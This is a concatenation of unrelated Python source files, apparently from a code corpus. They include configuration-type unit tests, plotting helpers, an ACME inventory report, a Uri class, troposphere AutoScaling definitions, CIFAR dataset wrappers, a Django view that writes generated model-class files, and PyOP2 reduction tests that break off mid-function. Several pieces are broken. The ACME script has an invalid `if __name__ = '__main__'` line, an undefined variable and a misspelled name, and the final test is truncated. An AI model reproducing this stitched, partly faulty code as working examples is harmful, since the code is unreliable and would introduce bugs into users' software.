#This software is distributed under the Creative Commons license (CC0) version 1.0. A copy of this license should have been distributed with this software.
#The license can also be read online: <https://creativecommons.org/publicdomain/zero/1.0/>. If this online license differs from the license provided with this software, the license provided with this software should be applied.
"""
Tests the behaviour of the validation and registration functions for
configuration types.
"""
import configurationtype #The module we're testing.
import configurationtype.configuration_error #To test whether ConfigurationError is raised.
import luna.plugins #To check whether a MetadataValidationError is raised.
import luna.tests #For parametrised tests
class IncompleteConfiguration:
"""
A mock class for a configuration type, except that it misses iteration.
"""
def __getattr__(self, *args, **kwargs):
"""
Gets the value of a configuration item. This raises an
``AssertionError``.
The metadata validator should never call any function on the instance.
:param args: All arguments will be put in the exception's message.
:param kwargs: All arguments will be put in the exception's message.
:raises AssertionError: Always.
"""
raise AssertionError("An item was requested by the metadata validator with parameters {args} and {kwargs}.".format(args=str(args), kwargs=str(kwargs)))
def __setattr__(self, *args, **kwargs):
"""
Changes the value of a configuration item. This raises an
``AssertionError``.
The metadata validator should never call any function on the instance.
:param args: All arguments will be put in the exception's message.
:param kwargs: All arguments will be put in the exception's message.
:raises AssertionError: Always.
"""
raise AssertionError("An item was set by the metadata validator with parameters {args} and {kwargs}.".format(args=str(args), kwargs=str(kwargs)))
def define(self, *args, **kwargs): #pylint: disable=no-self-use
"""
Creates a new configuration item. This raises an ``AssertionError``.
The metadata validator should never call any function on the instance.
:param args: All arguments will be put in the exception's message.
:param kwargs: All arguments will be put in the exception's message.
:raises AssertionError: Always.
"""
raise AssertionError("A new item was defined by the metadata validator with parameters {args} and {kwargs}.".format(args=str(args), kwargs=str(kwargs)))
def metadata(self, *args, **kwargs): #pylint: disable=no-self-use
"""
Obtains the metadata of an item. This raises an ``AssertionError``.
The metadata validator should never call any function on the instance.
:param args: All arguments will be put in the exception's message.
:param kwargs: All arguments will be put in the exception's message.
:raises AssertionError: Always.
"""
raise AssertionError("Item metadata was requested by the plug-in metadata validator with parameters {args} and {kwargs}.".format(args=str(args), kwargs=str(kwargs)))
class ValidConfiguration(IncompleteConfiguration):
"""
A mock class that is a valid implementation of a configuration instance.
"""
def __iter__(self, *args, **kwargs):
"""
Creates an iterator over the class. This raises an ``AssertionError``.
The metadata validator should never call any function on the instance.
:param args: All arguments will be put in the exception's message.
:param kwargs: All arguments will be put in the exception's message.
"""
raise AssertionError("The iteration function was called by the metadata validator with parameters {args} and {kwargs}.".format(args=str(args), kwargs=str(kwargs)))
class TestConfigurationType(luna.tests.TestCase):
"""
Tests the behaviour of the validation and registration functions for
configuration types.
"""
@luna.tests.parametrise({
"define": {"identity": "define"},
"__getattr__": {"identity": "__getattr__"},
"metadata": {"identity": "metadata"}
})
def test_register_clashing(self, identity):
"""
Tests whether registering a plug-in with an identity that clashes
results in a ``ConfigurationError``.
Normally we'd want to test this by patching the configuration API with
some class we made for this test, so that any changes to the API will
not cause false negatives for this test. However, since ``dir()`` is not
transparently patched through when using ``unittest.mock.patch()``, this
is not a viable option this time. We'll have to settle with updating the
test sometimes.
:param identity: The identity of the plug-in to register.
"""
with self.assertRaises(configurationtype.configuration_error.ConfigurationError):
configurationtype.register(identity, {})
@luna.tests.parametrise({
"preferences": {"identity": "preferences"},
"with_digit0": {"identity": "with_digit0"}
}) #pylint: disable=no-self-use
def test_register_safe(self, identity):
"""
Tests whether registering a plug-in with a good identity works.
:param identity: The identity of the plug-in to register.
"""
configurationtype.register(identity, {})
@staticmethod
def test_validate_metadata_correct():
"""
Tests the ``validate_metadata`` function against metadata that is
correct.
"""
configurationtype.validate_metadata({
"configuration": {
"name": "Test Configuration",
"instance": ValidConfiguration()
}
}) #Should not give an exception.
@luna.tests.parametrise({
"no_configuration": {
"metadata": {
"something_else": {}
}
},
"string": {
"metadata": {
"configuration": "not_a_dictionary"
}
},
"integer": {
"metadata": {
"configuration": 1337 #Even the "in" keyword won't work.
}
},
"none": {
"metadata": {
"configuration": None
}
},
"almost_dictionary": {
"metadata": {
"configuration": luna.tests.AlmostDictionary()
}
},
"empty": {
"metadata": {
"configuration": {}
}
},
"missing_name": {
"metadata": {
"instance": ValidConfiguration()
}
},
"missing_instance": {
"metadata": {
"name": "Test Missing Instance"
}
},
"name_not_string": {
"metadata": {
"name": 69,
"instance": ValidConfiguration()
}
},
"instance_none": {
"metadata": {
"name": "Test Instance None",
"instance": None,
}
},
"instance_str": {
"metadata": {
"name": "Test Instance String",
"instance": "Some Text" #Missing __getitem__, deserialise and serialise methods.
}
},
"instance_incomplete": {
"metadata": {
"name": "Test Instance Incomplete",
"instance": IncompleteConfiguration() #Missing __iter__ method.
}
}
})
def test_validate_metadata_incorrect(self, metadata):
"""
Tests the ``validate_metadata`` function against metadata that is
incorrect.
The function is tested with various instances of metadata, all of which
are incorrect. The test expects the function to raise a
``MetadataValidationError``.
:param metadata: Incorrect metadata.
"""
with self.assertRaises(luna.plugins.MetadataValidationError): #Should give this exception.
configurationtype.validate_metadata(metadata) | StarcoderdataPython |
72423 | <filename>kalman/animation.py
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as pl
def draw3d(ax, xyz, R, quadcolor):
# We draw in ENU coordinates, R and xyz are in NED
ax.scatter(xyz[1], xyz[0], -xyz[2], color=quadcolor)
ax.quiver(xyz[1], xyz[0], -xyz[2], R[0, 1], R[0, 0], R[0, 2], pivot='tail', \
color='red')
ax.quiver(xyz[1], xyz[0], -xyz[2], R[1, 1], R[1, 0], R[1, 2], pivot='tail', \
color='green')
ax.quiver(xyz[1], xyz[0], -xyz[2], -R[2, 1], -R[2, 0], -R[2, 2], pivot='tail', \
color='blue')
def draw2d(fig, X, fc, quadcolor):
agents = fc.agents
m = fc.m
pl.figure(fig)
for i in range(0, agents):
if m == 2:
pl.plot(X[m*i], X[m*i+1], 'o'+quadcolor[i])
def draw_edges(fig, X, fc, n):
agents = fc.agents
edges = fc.edges
m = fc.m
B = fc.B
pl.figure(fig)
a, b = 0, 0
for i in range(0, edges):
for j in range(0, agents):
if B[j,i] == 1:
a = j
elif B[j,i] == -1:
b = j
if m == 2:
if i == n:
pl.plot([X[m*a], X[m*b]], [X[m*a+1], X[m*b+1]], 'r--', lw=2)
else:
pl.plot([X[m*a], X[m*b]], [X[m*a+1], X[m*b+1]], 'k--', lw=2)
| StarcoderdataPython |
105684 | <filename>SC/acme_report.py
from random import randint, sample, uniform
from acme import Product
ADJECTIVES = ['Awesome', 'Shiny', 'Impressive', 'Portable', 'Improved']
NOUNS = ['Anvil', 'Catapult', 'Disguise', 'Mousetrap', '???']
def generate_products():
products = []
for i in range(30):
name = '{}{}'.format(sample(ADJECTIVES, k=1)[0],
sample(NOUNS, k=1)[0])
price = randint(5, 100)
weight = randint(5, 100)
flammability = float('{0:.2f}'.format(uniform(0.0, 2.5)))
prod = Product(name=name, price=price, weight=weight,
flammability=flammability)
products.append(prod)
return products
def inventory_report(products):
prod_name = [prod.name for prod in products]
print("Unique Product names: ", len(set(prod_names)))
avg_price = sum([prod.price for prod in products]) / len(products)
avg_wieght = sum([prod.weight for prod in products]) / len(products)
avg_flammability = sum([prod.flammability for prod in products]) / len(products)
print("="*42)
print("ACME CORPORATION OFFICIAL INVENTORY REPORT")
print("="*42)
print(f'Average Price: {avg_price:.2f}')
print(f'Average Weight: {avg_weight:.1f} lb')
print(f'Average Flammability: {avg_flammability:.2f}')
if __name__ = '__main__':
inventory_report(generate_products())
| StarcoderdataPython |
92251 |
import urllib
import urllib.parse
import zlib
class Uri:
def __init__(self, scheme: str, hostname: str, port: int, resource: str):
""" Simple Uri (Universal Resource Identifier) class to split/join uri components
format: scheme://hostname:port/resource (e.g. http://stuff.com:1234/personal/addressbook.xml)"""
self.scheme = scheme
self.hostname = hostname
self.port = port
self.resource = resource
@classmethod
def parse(cls, url_string):
""" Create a Uri instance by parsing a url string"""
url = urllib.parse.urlsplit(url_string)
return cls(scheme=url.scheme, hostname=url.hostname, port=url.port, resource=url.path)
def get_url(self, resource=None):
resource = resource if resource else self.resource
fmt = "{scheme}://{hostname}:{port}{resource}" if self.port is not None else "{scheme}://{hostname}{resource}"
return fmt.format(scheme=self.scheme, hostname=self.hostname, port=self.port, resource=resource)
def get_root_url(self):
fmt = "{scheme}://{hostname}:{port}" if self.port is not None else "{scheme}://{hostname}"
return fmt.format(scheme=self.scheme, hostname=self.hostname, port=self.port)
def copy(self, resource=None):
resource = resource if resource else self.resource
return Uri(scheme=self.scheme, hostname=self.hostname, port=self.port, resource=resource)
def __repr__(self):
return "Uri({scheme}, {hostname}, {port}, {resource}".format(**self.__dict__)
def __str__(self):
return self.get_url()
def __hash__(self):
return zlib.adler32(repr(self).encode())
def __eq__(self, other):
if isinstance(other, Uri):
return other.__hash__() == self.__hash__()
def __ne__(self, other):
return not self.__eq__(other) | StarcoderdataPython |
3238185 | <filename>python_schema/field/int_field.py<gh_stars>1-10
from python_schema import exception
from .base_field import BaseField
class IntField(BaseField):
def normalise(self, value):
value = super().normalise(value)
if value is None:
return value
message = f"IntField cannot be populated with value: {value}"
try:
# first convert to str so that 12.2 won't be accepted as integer
value = int(str(value))
except (TypeError, ValueError):
self.errors.append(message)
raise exception.NormalisationError(message)
return value
| StarcoderdataPython |
1781400 |
import sys
with open(sys.argv[1], 'r') as test_cases:
for test in test_cases:
stringe = test.strip()
lista = str(stringe)
lista2 =[]
indices = []
si_no = 0
for i in lista:
lista2.append(int(i))
for j in range (0,len(lista2)):
indices.append(j)
for k in range(0,len(lista2)):
if lista2.count(indices[k]) == lista2[k]:
si_no = 1
else:
si_no = 0
print (si_no) | StarcoderdataPython |
133976 | from nosuch.midiutil import *
from traceback import format_exc
from time import sleep
from nosuch.mididebug import *
from nosuch.midipypm import *
if __name__ == '__main__':
Midi.startup()
# m = MidiDebugHardware()
m = MidiPypmHardware()
a = m.input_devices()
for nm in a:
print "Opening input = ",nm
i = m.get_input(nm)
i.open()
def print_midi(msg,data):
print("MIDI = %s" % str(msg))
Midi.callback(print_midi,"dummy")
try:
while True:
sleep(1.0)
except KeyboardInterrupt:
print "Got KeyboardInterrupt!"
except:
print "Unexpected exception: %s" % format_exc()
Midi.shutdown()
print "End of midimon.py"
| StarcoderdataPython |
3237392 | from .Inventory import *
import globals as G
import EventHandler
class hotbar(Inventory):
def __init__(self):
Inventory.__init__(self)
EventHandler.eventhandler.on_event("on_draw_2D", self.draw)
def getSlots(self):
y = 27
return [
Slot(197, y),
Slot(239, y),
Slot(281, y),
Slot(323, y),
Slot(365, y),
Slot(407, y),
Slot(449, y),
Slot(491, y),
Slot(533, y),
]
def getImage(self):
return "./assets/textures/gui/hotbar_image.png"
def getImagePos(self):
return (180, 10)
def mouseOut(self):
return False
def drawBefore(self):
return [1, 2]
def getId(self):
return 1
handler.register(hotbar)
| StarcoderdataPython |
1743418 | # Copyright (c) 2012-2013, <NAME> <<EMAIL>>
# All rights reserved.
#
# See LICENSE file for full license.
from . import AWSHelperFn, AWSObject, AWSProperty
from .validators import boolean, integer, positive_integer
EC2_INSTANCE_LAUNCH = "autoscaling:EC2_INSTANCE_LAUNCH"
EC2_INSTANCE_LAUNCH_ERROR = "autoscaling:EC2_INSTANCE_LAUNCH_ERROR"
EC2_INSTANCE_TERMINATE = "autoscaling:EC2_INSTANCE_TERMINATE"
EC2_INSTANCE_TERMINATE_ERROR = "autoscaling:EC2_INSTANCE_TERMINATE_ERROR"
TEST_NOTIFICATION = "autoscaling:TEST_NOTIFICATION"
class Tag(AWSHelperFn):
def __init__(self, key, value, propogate):
self.data = {
'Key': key,
'Value': value,
'PropagateAtLaunch': propogate,
}
def JSONrepr(self):
return self.data
class NotificationConfiguration(AWSProperty):
props = {
'TopicARN': (basestring, True),
'NotificationTypes': (list, True),
}
class AutoScalingGroup(AWSObject):
type = "AWS::AutoScaling::AutoScalingGroup"
props = {
'AvailabilityZones': (list, True),
'Cooldown': (integer, False),
'DesiredCapacity': (integer, False),
'HealthCheckGracePeriod': (int, False),
'HealthCheckType': (basestring, False),
'LaunchConfigurationName': (basestring, True),
'LoadBalancerNames': (list, False),
'MaxSize': (positive_integer, True),
'MinSize': (positive_integer, True),
'NotificationConfiguration': (NotificationConfiguration, False),
'Tags': (list, False), # Although docs say these are required
'VPCZoneIdentifier': (list, False),
}
def validate(self):
if 'UpdatePolicy' in self.resource:
update_policy = self.resource['UpdatePolicy']
if int(update_policy.MinInstancesInService) >= int(self.MaxSize):
raise ValueError(
"The UpdatePolicy attribute "
"MinInstancesInService must be less than the "
"autoscaling group's MaxSize")
return True
class LaunchConfiguration(AWSObject):
type = "AWS::AutoScaling::LaunchConfiguration"
props = {
'AssociatePublicIpAddress': (boolean, False),
'BlockDeviceMappings': (list, False),
'EbsOptimized': (boolean, False),
'IamInstanceProfile': (basestring, False),
'ImageId': (basestring, True),
'InstanceMonitoring': (boolean, False),
'InstanceType': (basestring, True),
'KernelId': (basestring, False),
'KeyName': (basestring, False),
'RamDiskId': (basestring, False),
'SecurityGroups': (list, False),
'SpotPrice': (basestring, False),
'UserData': (basestring, False),
}
class ScalingPolicy(AWSObject):
type = "AWS::AutoScaling::ScalingPolicy"
props = {
'AdjustmentType': (basestring, True),
'AutoScalingGroupName': (basestring, True),
'Cooldown': (integer, False),
'ScalingAdjustment': (basestring, True),
}
class Trigger(AWSObject):
type = "AWS::AutoScaling::Trigger"
props = {
'AutoScalingGroupName': (basestring, True),
'BreachDuration': (integer, True),
'Dimensions': (list, True),
'LowerBreachScaleIncrement': (integer, False),
'LowerThreshold': (integer, True),
'MetricName': (basestring, True),
'Namespace': (basestring, True),
'Period': (integer, True),
'Statistic': (basestring, True),
'Unit': (basestring, False),
'UpperBreachScaleIncrement': (integer, False),
'UpperThreshold': (integer, True),
}
class EBSBlockDevice(AWSProperty):
props = {
'SnapshotId': (basestring, False),
'VolumeSize': (integer, False),
}
class BlockDeviceMapping(AWSProperty):
props = {
'DeviceName': (basestring, True),
'Ebs': (EBSBlockDevice, False),
'VirtualName': (basestring, False),
}
| StarcoderdataPython |
1645153 | import sys
import os
import os.path as osp
from torchvision.datasets import CIFAR10 as TVCIFAR10
from torchvision.datasets import CIFAR100 as TVCIFAR100
from torchvision.datasets import SVHN as TVSVHN
import knockoff.config as cfg
from torchvision.datasets.utils import check_integrity
import pickle
class CIFAR10(TVCIFAR10):
base_folder = 'cifar-10-batches-py'
meta = {
'filename': 'batches.meta',
'key': 'label_names',
'md5': '5ff9c542aee3614f3951f8cda6e48888',
}
def __init__(self, train=True, transform=None, target_transform=None, download=False):
# root = osp.join(cfg.DATASET_ROOT, 'cifar10')
root = "/home/zzq/Dataset/"
super().__init__(root, train, transform, target_transform, download)
def get_image(self, index):
return self.data[index]
class CIFAR100(TVCIFAR100):
base_folder = 'cifar-100-python'
meta = {
'filename': 'meta',
'key': 'fine_label_names',
'md5': '7973b15100ade9c7d40fb424638fde48',
}
def __init__(self, train=True, transform=None, target_transform=None, download=False):
root = osp.join(cfg.DATASET_ROOT, 'cifar100')
super().__init__(root, train, transform, target_transform, download)
def get_image(self, index):
return self.data[index]
class SVHN(TVSVHN):
def __init__(self, train=True, transform=None, target_transform=None, download=False):
root = osp.join(cfg.DATASET_ROOT, 'svhn')
# split argument should be one of {‘train’, ‘test’, ‘extra’}
if isinstance(train, bool):
split = 'train' if train else 'test'
else:
split = train
super().__init__(root, split, transform, target_transform, download) | StarcoderdataPython |
3210793 | <filename>website/backend/webserver/api/views/model_classes.py
from django.http import JsonResponse
from ..models import Project, ModelClass, DefaultAttribute
import json
from django.views.decorators.http import require_POST
from django.views.decorators.csrf import csrf_exempt
from pprint import pprint
import pathlib
import os
@csrf_exempt
@require_POST
def create_or_update_model_class(request):
body = json.loads(request.body)
project = Project.objects.filter(id=int(body['project'])).first()
if project is None:
return JsonResponse({'error': 'project could not be found'})
key = body['name'].replace(' ', '_').replace('-','_')
model_class = ModelClass.objects.filter(key=key, project=project).first()
if model_class is None:
model_class = ModelClass.objects.create(
key=key,
label=body['name'],
description=body['description'],
project=project,
run_step_code=body['run_step_code'])
else:
model_class.key = key
model_class.label = body['name']
model_class.description = body['description']
# project=project
print("inputed runstep code:")
model_class.run_step_code = body['run_step_code']
model_class.save()
for param in body['parameters']:
param['kind'] = 'param'
for state in body['states']:
state['kind'] = 'state'
for item in body['parameters'] + body['states']:
default_attr = DefaultAttribute.objects.filter(model_class=model_class, key=item['key'], kind=item['kind']).first()
if default_attr is None:
DefaultAttribute.objects.create(
key=item['key'],
label=item['label'],
dtype=item['dtype'],
units=item.get('units'),
kind=item['kind'],
is_private=item.get('private', False),
value=str(item['value']),
confidence=item.get('confidence', 0),
notes=item.get('notes', ''),
source=item.get('source', ''),
model_class=model_class
)
else:
default_attr.key=item['key']
default_attr.label=item['label']
default_attr.dtype=item['dtype']
default_attr.units=item.get('units')
default_attr.kind=item['kind']
default_attr.is_private=item.get('private', False)
default_attr.value=str(item['value'])
default_attr.confidence=item.get('confidence', 0)
default_attr.notes=item.get('notes', '')
default_attr.source=item.get('source', '')
default_attr.save()
# https://stackoverflow.com/questions/5362771/how-to-load-a-module-from-code-in-a-string
# Note: we probably want to save the code file here as that can then help with local iteration... but then we risk getting out of sync with the database...
# Note: We could check to see when running whether the code is equal to the file!
# Then ask the user to either upload or overwrite.
modelflow_root = pathlib.Path(__file__).parents[5]
projects_folder = os.path.join(modelflow_root, 'projects')
if not os.path.exists(projects_folder):
os.mkdir(projects_folder)
project_folder = os.path.join(projects_folder, project.name)
if not os.path.exists(project_folder):
os.mkdir(project_folder)
model_classes_dir = os.path.join(project_folder, 'model_classes')
if not os.path.exists(model_classes_dir):
os.mkdir(model_classes_dir)
write_file_for_model_class(model_classes_dir, model_class)
return JsonResponse({'id': model_class.id})
def write_file_for_model_class(model_classes_dir, model_class):
model_class_text = ''
# TODO: Handle imports
model_class_text += f'class {model_class.key}:\n'
model_class_text += f' name = "{model_class.label}"\n'
default_params = []
default_states = []
for attribute in DefaultAttribute.objects.filter(model_class=model_class):
value = attribute.value
dtype = attribute.dtype
if dtype in ['int']:
value = int(value)
elif dtype in ['float']:
value = float(value)
obj = dict(
key=attribute.key,
label=attribute.label,
units=attribute.units,
private=attribute.is_private,
value=value,
confidence=attribute.confidence,
notes=attribute.notes,
source=attribute.source
)
if attribute.kind == 'param':
default_params.append(obj)
else:
default_states.append(obj)
for part in [['params', default_params], ['states', default_states]]:
json_str = json.dumps(part[1], indent=4)
json_str = json_str.replace(': false', ': False')
json_str = json_str.replace(': true', ': True')
json_str = json_str.replace(': null', ': ""')
json_str = part[0] + ' = ' + json_str
lines = json_str.split('\n')
new_lines = []
for line in lines:
new_lines.append(' ' + line)
model_class_text += '\n'.join(new_lines)
model_class_text += '\n'
model_class_text += '\n @staticmethod\n'
for line in model_class.run_step_code.split('\n'):
model_class_text += ' ' + line + '\n'
with open(os.path.join(model_classes_dir, f'{model_class.key}.py'), 'w') as f:
f.write(model_class_text)
| StarcoderdataPython |
1755938 | <reponame>hackersandslackers/jsonld-scraper-tutorial<filename>main.py
"""Script entry point."""
from extruct_tutorial import scrape
from config import URL
scrape(URL)
| StarcoderdataPython |
1627962 | <filename>test/unit/test_global_reduction.py
# This file is part of PyOP2
#
# PyOP2 is Copyright (c) 2012, Imperial College London and
# others. Please see the AUTHORS file in the main source directory for
# a full list of copyright holders. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * The name of Imperial College London or that of other
# contributors may not be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTERS
# ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDERS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
# OF THE POSSIBILITY OF SUCH DAMAGE.
import pytest
import numpy
from numpy.testing import assert_allclose
from pyop2 import op2
# Large enough that there is more than one block and more than one
# thread per element in device backends
nelems = 4096
class TestGlobalReductions:
"""
Global reduction argument tests
"""
@pytest.fixture(scope='module', params=[(nelems, nelems, nelems, nelems),
(0, nelems, nelems, nelems),
(nelems / 2, nelems, nelems, nelems)])
def set(cls, request):
return op2.Set(request.param, 'set')
@pytest.fixture(scope='module')
def dset(cls, set):
return op2.DataSet(set, 1, 'set')
@pytest.fixture(scope='module')
def dset2(cls, set):
return op2.DataSet(set, 2, 'set2')
@pytest.fixture
def d1(cls, dset):
return op2.Dat(dset, numpy.arange(nelems) + 1, dtype=numpy.uint32)
@pytest.fixture
def d2(cls, dset2):
return op2.Dat(dset2, numpy.arange(2 * nelems) + 1, dtype=numpy.uint32)
@pytest.fixture(scope='module')
def k1_write_to_dat(cls):
k = """
void k(unsigned int *x, unsigned int *g) { *x = *g; }
"""
return op2.Kernel(k, "k")
@pytest.fixture(scope='module')
def k1_inc_to_global(cls):
k = """
void k(unsigned int *x, unsigned int *g) { *g += *x; }
"""
return op2.Kernel(k, "k")
@pytest.fixture(scope='module')
def k1_min_to_global(cls):
k = """
void k(unsigned int *x, unsigned int *g) { if (*x < *g) *g = *x; }
"""
return op2.Kernel(k, "k")
@pytest.fixture(scope='module')
def k2_min_to_global(cls):
k = """
void k(unsigned int *x, unsigned int *g) {
if (x[0] < g[0]) g[0] = x[0];
if (x[1] < g[1]) g[1] = x[1];
}
"""
return op2.Kernel(k, "k")
@pytest.fixture(scope='module')
def k1_max_to_global(cls):
k = """
void k(unsigned int *x, unsigned int *g) {
if (*x > *g) *g = *x;
}
"""
return op2.Kernel(k, "k")
@pytest.fixture(scope='module')
def k2_max_to_global(cls):
k = """
void k(unsigned int *x, unsigned int *g) {
if (x[0] > g[0]) g[0] = x[0];
if (x[1] > g[1]) g[1] = x[1];
}
"""
return op2.Kernel(k, "k")
@pytest.fixture(scope='module')
def k2_write_to_dat(cls, request):
k = """
void k(unsigned int *x, unsigned int *g) { *x = g[0] + g[1]; }
"""
return op2.Kernel(k, "k")
@pytest.fixture(scope='module')
def k2_inc_to_global(cls):
k = """
void k(unsigned int *x, unsigned int *g) { g[0] += x[0]; g[1] += x[1]; }
"""
return op2.Kernel(k, "k")
@pytest.fixture
def duint32(cls, dset):
return op2.Dat(dset, [12] * nelems, numpy.uint32, "duint32")
@pytest.fixture
def dint32(cls, dset):
return op2.Dat(dset, [-12] * nelems, numpy.int32, "dint32")
@pytest.fixture
def dfloat32(cls, dset):
return op2.Dat(dset, [-12.0] * nelems, numpy.float32, "dfloat32")
@pytest.fixture
def dfloat64(cls, dset):
return op2.Dat(dset, [-12.0] * nelems, numpy.float64, "dfloat64")
def test_direct_min_uint32(self, backend, set, duint32):
kernel_min = """
void kernel_min(unsigned int* x, unsigned int* g)
{
if ( *x < *g ) *g = *x;
}
"""
g = op2.Global(1, 8, numpy.uint32, "g")
op2.par_loop(op2.Kernel(kernel_min, "kernel_min"), set,
duint32(op2.READ),
g(op2.MIN))
assert g.data[0] == 8
def test_direct_min_int32(self, backend, set, dint32):
kernel_min = """
void kernel_min(int* x, int* g)
{
if ( *x < *g ) *g = *x;
}
"""
g = op2.Global(1, 8, numpy.int32, "g")
op2.par_loop(op2.Kernel(kernel_min, "kernel_min"), set,
dint32(op2.READ),
g(op2.MIN))
assert g.data[0] == -12
def test_direct_max_int32(self, backend, set, dint32):
kernel_max = """
void kernel_max(int* x, int* g)
{
if ( *x > *g ) *g = *x;
}
"""
g = op2.Global(1, -42, numpy.int32, "g")
op2.par_loop(op2.Kernel(kernel_max, "kernel_max"), set,
dint32(op2.READ),
g(op2.MAX))
assert g.data[0] == -12
def test_direct_min_float(self, backend, set, dfloat32):
kernel_min = """
void kernel_min(float* x, float* g)
{
if ( *x < *g ) *g = *x;
}
"""
g = op2.Global(1, -.8, numpy.float32, "g")
op2.par_loop(op2.Kernel(kernel_min, "kernel_min"), set,
dfloat32(op2.READ),
g(op2.MIN))
assert_allclose(g.data[0], -12.0)
def test_direct_max_float(self, backend, set, dfloat32):
kernel_max = """
void kernel_max(float* x, float* g)
{
if ( *x > *g ) *g = *x;
}
"""
g = op2.Global(1, -42.8, numpy.float32, "g")
op2.par_loop(op2.Kernel(kernel_max, "kernel_max"), set,
dfloat32(op2.READ),
g(op2.MAX))
assert_allclose(g.data[0], -12.0)
def test_direct_min_double(self, backend, set, dfloat64):
kernel_min = """
void kernel_min(double* x, double* g)
{
if ( *x < *g ) *g = *x;
}
"""
g = op2.Global(1, -.8, numpy.float64, "g")
op2.par_loop(op2.Kernel(kernel_min, "kernel_min"), set,
dfloat64(op2.READ),
g(op2.MIN))
assert_allclose(g.data[0], -12.0)
def test_direct_max_double(self, backend, set, dfloat64):
kernel_max = """
void kernel_max(double* x, double* g)
{
if ( *x > *g ) *g = *x;
}
"""
g = op2.Global(1, -42.8, numpy.float64, "g")
op2.par_loop(op2.Kernel(kernel_max, "kernel_max"), set,
dfloat64(op2.READ),
g(op2.MAX))
assert_allclose(g.data[0], -12.0)
def test_1d_read(self, backend, k1_write_to_dat, set, d1):
g = op2.Global(1, 1, dtype=numpy.uint32)
op2.par_loop(k1_write_to_dat, set,
d1(op2.WRITE),
g(op2.READ))
assert all(d1.data == g.data)
def test_1d_read_no_init(self, backend, k1_write_to_dat, set, d1):
g = op2.Global(1, dtype=numpy.uint32)
d1.data[:] = 100
op2.par_loop(k1_write_to_dat, set,
d1(op2.WRITE),
g(op2.READ))
assert all(g.data == 0)
assert all(d1.data == 0)
def test_2d_read(self, backend, k2_write_to_dat, set, d1):
g = op2.Global(2, (1, 2), dtype=numpy.uint32)
op2.par_loop(k2_write_to_dat, set,
d1(op2.WRITE),
g(op2.READ))
assert all(d1.data == g.data.sum())
def test_1d_inc(self, backend, k1_inc_to_global, set, d1):
g = op2.Global(1, 0, dtype=numpy.uint32)
op2.par_loop(k1_inc_to_global, set,
d1(op2.READ),
g(op2.INC))
assert g.data == d1.data.sum()
def test_1d_inc_no_data(self, backend, k1_inc_to_global, set, d1):
g = op2.Global(1, dtype=numpy.uint32)
op2.par_loop(k1_inc_to_global, set,
d1(op2.READ),
g(op2.INC))
assert g.data == d1.data.sum()
def test_1d_min_dat_is_min(self, backend, k1_min_to_global, set, d1):
val = d1.data.min() + 1
g = op2.Global(1, val, dtype=numpy.uint32)
op2.par_loop(k1_min_to_global, set,
d1(op2.READ),
g(op2.MIN))
assert g.data == d1.data.min()
def test_1d_min_global_is_min(self, backend, k1_min_to_global, set, d1):
d1.data[:] += 10
val = d1.data.min() - 1
g = op2.Global(1, val, dtype=numpy.uint32)
op2.par_loop(k1_min_to_global, set,
d1(op2.READ),
g(op2.MIN))
assert g.data == val
def test_1d_max_dat_is_max(self, backend, k1_max_to_global, set, d1):
val = d1.data.max() - 1
g = op2.Global(1, val, dtype=numpy.uint32)
op2.par_loop(k1_max_to_global, set,
d1(op2.READ),
g(op2.MAX))
assert g.data == d1.data.max()
def test_1d_max_global_is_max(self, backend, k1_max_to_global, set, d1):
val = d1.data.max() + 1
g = op2.Global(1, val, dtype=numpy.uint32)
op2.par_loop(k1_max_to_global, set,
d1(op2.READ),
g(op2.MAX))
assert g.data == val
def test_2d_inc(self, backend, k2_inc_to_global, set, d2):
g = op2.Global(2, (0, 0), dtype=numpy.uint32)
op2.par_loop(k2_inc_to_global, set,
d2(op2.READ),
g(op2.INC))
assert g.data[0] == d2.data[:, 0].sum()
assert g.data[1] == d2.data[:, 1].sum()
def test_2d_min_dat_is_min(self, backend, k2_min_to_global, set, d2):
val_0 = d2.data[:, 0].min() + 1
val_1 = d2.data[:, 1].min() + 1
g = op2.Global(2, (val_0, val_1), dtype=numpy.uint32)
op2.par_loop(k2_min_to_global, set,
d2(op2.READ),
g(op2.MIN))
assert g.data[0] == d2.data[:, 0].min()
assert g.data[1] == d2.data[:, 1].min()
def test_2d_min_global_is_min(self, backend, k2_min_to_global, set, d2):
d2.data[:, 0] += 10
d2.data[:, 1] += 10
val_0 = d2.data[:, 0].min() - 1
val_1 = d2.data[:, 1].min() - 1
g = op2.Global(2, (val_0, val_1), dtype=numpy.uint32)
op2.par_loop(k2_min_to_global, set,
d2(op2.READ),
g(op2.MIN))
assert g.data[0] == val_0
assert g.data[1] == val_1
def test_2d_max_dat_is_max(self, backend, k2_max_to_global, set, d2):
val_0 = d2.data[:, 0].max() - 1
val_1 = d2.data[:, 1].max() - 1
g = op2.Global(2, (val_0, val_1), dtype=numpy.uint32)
op2.par_loop(k2_max_to_global, set,
d2(op2.READ),
g(op2.MAX))
assert g.data[0] == d2.data[:, 0].max()
assert g.data[1] == d2.data[:, 1].max()
def test_2d_max_global_is_max(self, backend, k2_max_to_global, set, d2):
max_val_0 = d2.data[:, 0].max() + 1
max_val_1 = d2.data[:, 1].max() + 1
g = op2.Global(2, (max_val_0, max_val_1), dtype=numpy.uint32)
